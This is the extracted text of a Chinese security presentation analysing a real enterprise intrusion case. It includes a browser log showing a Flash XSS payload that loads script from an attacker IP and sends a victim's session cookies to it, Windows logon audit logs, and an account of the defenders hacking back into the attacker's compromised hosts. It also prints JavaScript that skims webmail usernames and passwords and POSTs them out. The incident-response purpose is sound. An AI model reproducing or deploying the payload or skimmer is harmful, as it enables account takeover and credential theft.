More Related Content Similar to 9.“企业应急响应与反渗透”之真实案例分析 (20) 9.“企业应急响应与反渗透”之真实案例分析17. ==================================================
URL : http://t.cn/zWI1bUQ
Last Visit Date : 2012-7-16 19:22:27
==================================================
==================================================
URL : http://50.116.13.242/index.php
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://t.cn/zWI1bUQ
==================================================
==================================================
URL : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://50.116.13.242/index.php
Title : player.swf (application/x-shockwave-flash 对象)
==================================================
==================================================
URL : http://50.116.13.242/e.php?opener=0&cookie=ULV
%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma
%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn
%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B
%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry
%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B
%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des
%253D5937b4f4509871fc45195767ea7abe37%2526ev
%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c
%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V
%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2
Last Visit Date : 2012-7-16 19:22:31
Referrer : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
==================================================
21. • 通过 IP / 邮箱信息定位到某公司安全⼈人员
• 没有恶意⺫⽬目的
关于攻击者
• 后⾯面有把漏洞提交乌云
29. • 收集攻击者 IP
• ⼤大多是⾁肉鸡 IP,⾹香港,廊坊
吹响反击号⾓角
• ⽤用“⿊黑客”的⽅方法拿到⾹香港,廊坊多台⾁肉鸡权限
• 在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志
• 在⾁肉鸡上发现内⺴⽹网仍有服务器被控制
38. 2011-‐11-‐10,14:03:47,Security,审核成功,登录/注销
,540,**,PDC,”成功的网络登录:
用户名:
*.ad
域:
*
登录
ID:
(0x0,0x1114E11)
登录类型:
3
登录过程:
NtLmSsp
身份验证数据包:
NTLM
工作站名:
CC-‐TEST-‐V2
登录
GUID:
-‐
调用方用户名:
-‐
调用方域:
-‐
调用方登录
ID:
-‐
调用方进程
ID:
-‐
传递服务:
-‐
源网络地址:
192.168.100.81
源端口:
0
2011-‐11-‐10,3:13:38,Security,审核失败,帐户登录
,680,NT
AUTHORITYSYSTEM,PDC,"尝试登录的用户:
MICROSOFT_AUTHENTICATION_PACKAGE_V1_
登录帐户:
QM-‐*$
源工作站:
CC-‐TEST-‐V2
错误代码:
0xC000006A
"
2011-‐11-‐10,3:13:38,Security,审核失败,帐户登录
,680,NT
AUTHORITYSYSTEM,PDC,"尝试登录的用户:
MICROSOFT_AUTHENTICATION_PACKAGE_V1_
登录帐户:
QM-‐*$
源工作站:
CC-‐TEST-‐V2
错误代码:
0xC000006A
45. • 美国的 vps 上含有多个 QQ 和密码
关于攻击者
• 之前获取到其国内论坛帐号
51. function ffCheck() {
try {
try {
var u = null != f ? f.idInput.value : document.getElementById("idInput").value;
} catch (e) {
var u = (document.getElementById("idInput").innerHTML).replace(/s/g, "");
}
var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;
if (u.indexOf("@") == -1) u += "@xxx.com";
try {
if (u.indexOf("@") == -1) u = u + getdomain();
} catch (e) {}
sendurl("/abc", u, p, "coremail");
} catch (e) {}
return fOnSubmit();
}
52. function sendurl(uri, u, p, i) {
xmlHttp = GetXmlHttpObject();
if (xmlHttp == null) {
return;
}
param = "user=" + u + "&pass=" + p + "&icp=" + i;
xmlHttp.onreadystatechange = stateChanged;
try {
xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);
} catch (e) {}
xmlHttp.setRequestHeader("If-Modified-Since", "0");
xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlHttp.send(param);
}